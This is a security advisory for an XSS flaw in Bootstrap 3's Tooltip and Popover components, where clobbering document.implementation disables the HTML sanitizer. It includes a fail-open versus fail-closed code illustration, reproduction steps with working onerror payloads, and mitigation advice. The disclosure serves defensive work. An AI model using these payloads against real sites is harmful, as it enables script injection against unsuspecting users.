Overview
Bootstrap is an HTML, CSS, and JS framework for developing responsive, mobile-first web sites and applications.
A cross-site scripting (XSS) vulnerability (CVE-2025-1647) has been identified in the Bootstrap 3 Popover and Tooltip components, which allows unsanitized HTML to be rendered in the tooltip or popover content.
Per OWASP: Cross-Site Scripting attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. An attacker can use XSS to send a malicious script to an unsuspecting user.
This issue affects Bootstrap versions greater than or equal to 3.4.1 and less than 4.0.0.
Details
Module Info
- Product: Bootstrap
- Affected packages: bootstrap
- Affected versions: >=3.4.1 <4.0.0
- GitHub repository: https://github.com/twbs/bootstrap
- Published packages: https://npmjs.com/package/bootstrap
- Package manager: npm
- Fixed in: Bootstrap NES v3.4.7
Vulnerability Info
This Medium-severity vulnerability is found in the Popover and Tooltip components of Bootstrap in versions greater than or equal to 3.4.1 and less than 4.0.0.
DOM-based cross-site scripting (XSS) via DOM clobbering occurs when an attacker manipulates the Document Object Model (DOM) to overwrite or "clobber" an existing DOM object, leading to the execution of malicious scripts. This technique takes advantage of the browser's handling of named DOM elements and can occur entirely on the client side, bypassing traditional XSS protections on the server. In this case, Bootstrap's sanitizeHtml function can be forced to skip sanitization entirely: when document.implementation is clobbered by a named element, the createHTMLDocument method is no longer reachable, and the function falls back to returning the HTML unsanitized.
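To make the failure mode concrete, the following is an added example (not Bootstrap's own code) that models the fail-open fallback described above beside a fail-closed check; the fake `document` objects, `stripTags`, and the function names are constructed for illustration.

```javascript
// Added example (not Bootstrap's source): a simplified model of the fail-open
// fallback the advisory describes, beside a fail-closed alternative. A minimal
// fake `document` is constructed so the example runs under Node without a browser.

// Constructed stand-in for the real parse-and-filter step: strips every tag.
function stripTags(html) {
  return html.replace(/<[^>]*>/g, '');
}

// Detects a clobbered document.implementation: an element reached through the
// document's named-property lookup has a tagName and no callable
// createHTMLDocument. In a browser, `instanceof DOMImplementation` is also
// checked when that constructor exists.
function isImplementationClobbered(doc) {
  const impl = doc.implementation;
  if (!impl || typeof impl.createHTMLDocument !== 'function') return true;
  if (typeof impl.tagName === 'string') return true;
  if (typeof DOMImplementation === 'function' && !(impl instanceof DOMImplementation)) return true;
  return false;
}

// Fail-open shape (assumption: modelled on the legacy-browser fallback, not the
// exact Bootstrap code): a missing createHTMLDocument returns the raw HTML.
function sanitizeFailOpen(unsafeHtml, doc) {
  if (!doc.implementation || !doc.implementation.createHTMLDocument) {
    return unsafeHtml; // sanitization skipped: this is the path DOM clobbering reaches
  }
  return stripTags(unsafeHtml);
}

// Fail-closed variant: if the DOM API cannot be trusted, render nothing.
function sanitizeFailClosed(unsafeHtml, doc) {
  if (isImplementationClobbered(doc)) {
    return ''; // refuse rather than pass through; a good place to log for detection
  }
  return stripTags(unsafeHtml);
}

// Constructed documents: a normal one, and one where <img name="implementation">
// shadows document.implementation with the image element itself.
const normalDoc = { implementation: { createHTMLDocument: () => ({ body: {} }) } };
const clobberedDoc = { implementation: { tagName: 'IMG', name: 'implementation', src: 'clobbered' } };

// The advisory's tooltip payload.
const payload = "<img src=x onerror=alert('unsanitized tooltip')>";

console.log(sanitizeFailOpen(payload, clobberedDoc) === payload); // true: passed through
console.log(sanitizeFailClosed(payload, clobberedDoc) === '');    // true: blocked
```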
Steps to Reproduce
1. Create an HTML page that is set up to use Bootstrap v3.4.1.
2. Add an image tag that will clobber document.implementation by giving the name attribute the value implementation. For example:
<img name="implementation" src="clobbered" />
3. Add a button tag that has data-toggle="tooltip" and data-html="true". In the title attribute, give it the value <img src=x onerror=alert('unsanitized tooltip')>. For example:
<button
id="button1"
data-toggle="tooltip"
data-html="true"
title="<img src=x onerror=alert('unsanitized tooltip')>"
>Click Me</button>
<script>
$(document).ready(function () {
$('#button1').tooltip();
});
</script>
4. Alternatively, you can add a button tag that has data-toggle="popover" and data-html="true". In the title attribute, give it the value <img src=y onerror=alert('unsanitized popover title')> and in the data-content attribute, give it the value <img src=z onerror=alert('unsanitized popover data')>. For example:
<button
id="button2"
data-toggle="popover"
data-html="true"
title="<img src=y onerror=alert('unsanitized popover title')>"
data-content="<img src=z onerror=alert('unsanitized popover data')>"
>Click Me</button>
<script>
$(document).ready(function () {
$('#button2').popover();
});
</script>
Proof of Concept
A full reproduction with code similar to the above can be found here:
XSS using DOM Clobbering during HTML sanitization PoC
Credits
- Johan Carlsson (joaxcar) (finder)
Mitigation
The Bootstrap 3 version is End-of-Life and will not receive any updates to address this issue. For more information see here.
Users of the affected components should apply one of the following mitigations:
- Migrate affected applications to a supported version of Bootstrap.
- Leverage a commercial support partner like HeroDevs for post-EOL security support.